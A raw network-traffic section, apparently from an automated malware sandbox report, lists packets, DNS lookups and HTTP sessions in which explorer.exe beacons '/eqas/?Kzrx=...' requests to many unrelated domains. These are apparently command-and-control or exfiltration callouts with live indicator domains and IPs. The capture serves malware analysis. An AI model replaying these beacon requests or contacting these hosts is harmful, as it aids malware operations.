                                                                Apr 12, 2021 09:45:55.265378952 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:45:55.265537024 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.265568972 CEST4974280192.168.2.6167.114.6.31
                                                                Apr 12, 2021 09:45:55.402008057 CEST8049742167.114.6.31192.168.2.6
                                                                Apr 12, 2021 09:46:00.427798033 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.476243973 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.476751089 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.477360964 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.527318954 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808547020 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808581114 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808593988 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.808857918 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.808890104 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.811026096 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.811043978 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.811091900 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.811155081 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:00.857197046 CEST804974335.244.230.236192.168.2.6
                                                                Apr 12, 2021 09:46:00.857292891 CEST4974380192.168.2.635.244.230.236
                                                                Apr 12, 2021 09:46:11.315201044 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.506691933 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.506911039 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.507055998 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.699726105 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701028109 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701047897 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:11.701212883 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.701270103 CEST4974680192.168.2.623.225.41.92
                                                                Apr 12, 2021 09:46:11.892635107 CEST804974623.225.41.92192.168.2.6
                                                                Apr 12, 2021 09:46:27.286428928 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.540777922 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:27.540909052 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.541057110 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:27.795403957 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.047282934 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.299175024 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.299216032 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.299283981 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.299313068 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:28.303107977 CEST804975214.129.120.32192.168.2.6
                                                                Apr 12, 2021 09:46:28.303395987 CEST4975280192.168.2.614.129.120.32
                                                                Apr 12, 2021 09:46:33.369340897 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:36.375056028 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:42.375618935 CEST4975480192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:55.489099026 CEST4975580192.168.2.652.79.124.173
                                                                Apr 12, 2021 09:46:58.502070904 CEST4975580192.168.2.652.79.124.173

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 12, 2021 09:44:40.411415100 CEST6204453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:44:40.471421957 CEST53620448.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:44:45.318442106 CEST6379153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:44:45.379901886 CEST53637918.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:02.403493881 CEST6426753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:02.452065945 CEST53642678.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:06.926908970 CEST4944853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:06.976300955 CEST53494488.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:07.975091934 CEST6034253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:08.028865099 CEST53603428.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:09.767848015 CEST6134653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:09.816939116 CEST53613468.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:10.665086031 CEST5177453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:10.713872910 CEST53517748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:13.507540941 CEST5602353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:13.556178093 CEST53560238.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:14.507272005 CEST5838453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:14.558725119 CEST53583848.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:15.601089954 CEST6026153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:15.652643919 CEST53602618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:16.397460938 CEST5606153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:16.447098970 CEST53560618.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:16.693782091 CEST5833653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:16.744230032 CEST53583368.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:24.159548044 CEST5378153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:24.208345890 CEST53537818.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:26.310167074 CEST5406453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:26.374116898 CEST53540648.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:33.957351923 CEST5281153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:34.008945942 CEST53528118.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:38.098738909 CEST5529953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:38.181229115 CEST53552998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:38.245935917 CEST6374553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:38.294830084 CEST53637458.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:42.444972992 CEST5005553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:42.493585110 CEST53500558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:43.234297991 CEST6137453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:43.282898903 CEST53613748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:43.401276112 CEST5033953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:43.477227926 CEST53503398.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:44.023648024 CEST6330753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:44.072280884 CEST53633078.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:46.757334948 CEST4969453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:46.931324959 CEST53496948.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:47.535931110 CEST5498253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:47.638746977 CEST53549828.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.178205013 CEST5001053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.333719015 CEST6371853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.398461103 CEST53637188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.424993992 CEST53500108.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:48.852025986 CEST6211653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:48.912116051 CEST53621168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:49.049273968 CEST6381653192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:49.195744038 CEST53638168.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:49.485671043 CEST5501453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:49.547981024 CEST53550148.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:50.095978022 CEST6220853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:50.155900955 CEST53622088.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:50.676520109 CEST5757453192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:50.733710051 CEST53575748.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:51.402580976 CEST5181853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:51.526132107 CEST53518188.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:52.361677885 CEST5662853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:52.425081015 CEST53566288.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:52.886096954 CEST6077853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:52.943603992 CEST53607788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:54.694713116 CEST5379953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:54.760945082 CEST53537998.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:45:54.822232008 CEST5468353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:45:54.989849091 CEST53546838.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:00.279237032 CEST5932953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:00.426578045 CEST53593298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:01.417362928 CEST6402153192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:01.468851089 CEST53640218.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:02.381097078 CEST5612953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:02.430174112 CEST53561298.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:05.835242987 CEST5817753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:05.914354086 CEST53581778.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:10.956753969 CEST5070053192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:11.314012051 CEST53507008.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:16.721827984 CEST5406953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:16.811510086 CEST53540698.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:18.767153978 CEST6117853192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:18.846771955 CEST53611788.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:21.827483892 CEST5701753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:21.893973112 CEST53570178.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:25.161154985 CEST5632753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:25.211283922 CEST53563278.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:25.978316069 CEST5024353192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:26.026947975 CEST53502438.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:26.930490971 CEST6205553192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:27.285378933 CEST53620558.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:27.477775097 CEST6124953192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:27.551372051 CEST53612498.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:33.058473110 CEST6525253192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:33.364765882 CEST53652528.8.8.8192.168.2.6
                                                                Apr 12, 2021 09:46:55.098449945 CEST6436753192.168.2.68.8.8.8
                                                                Apr 12, 2021 09:46:55.480940104 CEST53643678.8.8.8192.168.2.6

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 12, 2021 09:45:38.098738909 CEST192.168.2.68.8.8.80x18Standard query (0)www.cjaccessories.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.401276112 CEST192.168.2.68.8.8.80x601aStandard query (0)www.sportfest40.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.049273968 CEST192.168.2.68.8.8.80x76f7Standard query (0)www.kakavjesajt.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.822232008 CEST192.168.2.68.8.8.80x1dd4Standard query (0)www.cursosdigitaisbr.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:00.279237032 CEST192.168.2.68.8.8.80x1b8bStandard query (0)www.llmav.xyzA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:05.835242987 CEST192.168.2.68.8.8.80xb9ffStandard query (0)www.360caiyin.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:10.956753969 CEST192.168.2.68.8.8.80x2afcStandard query (0)www.35efb510815e.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:16.721827984 CEST192.168.2.68.8.8.80x13eeStandard query (0)www.nescleanups.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:21.827483892 CEST192.168.2.68.8.8.80xfeStandard query (0)www.stripepayment.onlineA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:26.930490971 CEST192.168.2.68.8.8.80xa915Standard query (0)www.beyoncos.comA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:33.058473110 CEST192.168.2.68.8.8.80x756Standard query (0)www.mg-izkerr8.netA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:55.098449945 CEST192.168.2.68.8.8.80x92afStandard query (0)www.mg-izkerr8.netA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 12, 2021 09:45:38.181229115 CEST8.8.8.8192.168.2.60x18No error (0)www.cjaccessories.netshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:38.181229115 CEST8.8.8.8192.168.2.60x18No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.477227926 CEST8.8.8.8192.168.2.60x601aNo error (0)www.sportfest40.com104.21.28.135A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:43.477227926 CEST8.8.8.8192.168.2.60x601aNo error (0)www.sportfest40.com172.67.170.213A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.195744038 CEST8.8.8.8192.168.2.60x76f7No error (0)www.kakavjesajt.comkakavjesajt.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:49.195744038 CEST8.8.8.8192.168.2.60x76f7No error (0)kakavjesajt.com176.104.107.18A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.989849091 CEST8.8.8.8192.168.2.60x1dd4No error (0)www.cursosdigitaisbr.comcursosdigitaisbr.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:45:54.989849091 CEST8.8.8.8192.168.2.60x1dd4No error (0)cursosdigitaisbr.com167.114.6.31A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:00.426578045 CEST8.8.8.8192.168.2.60x1b8bNo error (0)www.llmav.xyz35.244.230.236A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:05.914354086 CEST8.8.8.8192.168.2.60xb9ffServer failure (2)www.360caiyin.comnonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:11.314012051 CEST8.8.8.8192.168.2.60x2afcNo error (0)www.35efb510815e.com34.anxin58.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 12, 2021 09:46:11.314012051 CEST8.8.8.8192.168.2.60x2afcNo error (0)34.anxin58.com23.225.41.92A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:16.811510086 CEST8.8.8.8192.168.2.60x13eeName error (3)www.nescleanups.comnonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:21.893973112 CEST8.8.8.8192.168.2.60xfeName error (3)www.stripepayment.onlinenonenoneA (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:27.285378933 CEST8.8.8.8192.168.2.60xa915No error (0)www.beyoncos.com14.129.120.32A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:27.285378933 CEST8.8.8.8192.168.2.60xa915No error (0)www.beyoncos.com14.129.120.31A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:33.364765882 CEST8.8.8.8192.168.2.60x756No error (0)www.mg-izkerr8.net52.79.124.173A (IP address)IN (0x0001)
                                                                Apr 12, 2021 09:46:55.480940104 CEST8.8.8.8192.168.2.60x92afNo error (0)www.mg-izkerr8.net52.79.124.173A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.cjaccessories.net
                                                                • www.sportfest40.com
                                                                • www.kakavjesajt.com
                                                                • www.cursosdigitaisbr.com
                                                                • www.llmav.xyz
                                                                • www.35efb510815e.com
                                                                • www.beyoncos.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.64971923.227.38.7480C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:38.229357958 CEST1268OUTGET /eqas/?Kzrx=zlzoH+ErGdORI3KgnipEDQmAM+5mnlewXlSz4LF6ZDcdx8uItHTjoqljxUMZx7tHvLXvbS3vgg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cjaccessories.net
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:38.392312050 CEST1270INHTTP/1.1 403 Forbidden
                                                                Date: Mon, 12 Apr 2021 07:45:38 GMT
                                                                Content-Type: text/html
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Vary: Accept-Encoding
                                                                X-Sorting-Hat-PodId: 176
                                                                X-Sorting-Hat-ShopId: 46331166869
                                                                X-Dc: gcp-us-central1
                                                                X-Request-ID: 43a3242b-95f4-408b-8137-67f860923cdc
                                                                Set-Cookie: _shopify_fs=2021-04-12T07%3A45%3A38Z; Expires=Tue, 12-Apr-22 07:45:38 GMT; Domain=cjaccessories.net; Path=/; SameSite=Lax
                                                                X-Permitted-Cross-Domain-Policies: none
                                                                X-Content-Type-Options: nosniff
                                                                X-Download-Options: noopen
                                                                X-XSS-Protection: 1; mode=block
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0966a421d500002c26c3167000000001
                                                                Server: cloudflare
                                                                CF-RAY: 63ead61629122c26-FRA
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                Data Raw: 33 33 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e
                                                                Data Ascii: 330<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.649723104.21.28.13580C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:43.519484043 CEST1302OUTGET /eqas/?Kzrx=5vTDjg0AbqyZCldj/4uhpy3uniwA6wzjOzlj8Zy6y3xAduLQBKf0xYSENAev/AVhLePpE/aK2w==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.sportfest40.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.649730176.104.107.1880C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:49.271539927 CEST1582OUTGET /eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.kakavjesajt.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:49.777462006 CEST1597INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 12 Apr 2021 07:45:49 GMT
                                                                Server: Apache
                                                                X-Powered-By: PHP/7.2.22
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Upgrade: h2,h2c
                                                                Connection: Upgrade, close
                                                                Location: http://kakavjesajt.com/eqas/?Kzrx=2WJx48jh/thZFm4UaW0+TWvb4qp7q1IcEsHJj26+PoNJlpUOGtb5NswHfLJoC/AYmsRkDoJx/Q==&4h3=vZRDNDdpalAdz8
                                                                Vary: User-Agent
                                                                Content-Length: 0
                                                                Content-Type: text/html; charset=UTF-8


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.649742167.114.6.3180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:45:55.128757954 CEST2267OUTGET /eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.cursosdigitaisbr.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:45:55.265363932 CEST2839INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Mon, 12 Apr 2021 07:45:54 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 162
                                                                Connection: close
                                                                Location: https://cursosdigitaisbr.com/eqas/?Kzrx=967KBfj8+VhMtFT4MuSkf1Q16ympYDb2+7V4ZV0KQDLb45yTiH1Ahm088ZXNCPpC8jR0PY64Fw==&4h3=vZRDNDdpalAdz8
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.64974335.244.230.23680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:00.477360964 CEST5382OUTGET /eqas/?Kzrx=ZOpWeYl13G0nYt67dVF2CnLu74JWwlwH6kqD7vFNiwsDSsXFN4+zplc98svsYfoyCRsuDbeIEw==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.llmav.xyz
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:00.808547020 CEST5386INHTTP/1.1 200 OK
                                                                Server: nginx/1.14.0
                                                                Date: Mon, 12 Apr 2021 07:46:00 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 3584
                                                                Last-Modified: Mon, 12 Apr 2021 03:00:16 GMT
                                                                Vary: Accept-Encoding
                                                                ETag: "6073b7c0-e00"
                                                                Cache-Control: no-cache
                                                                Accept-Ranges: bytes
                                                                Via: 1.1 google
                                                                Connection: close
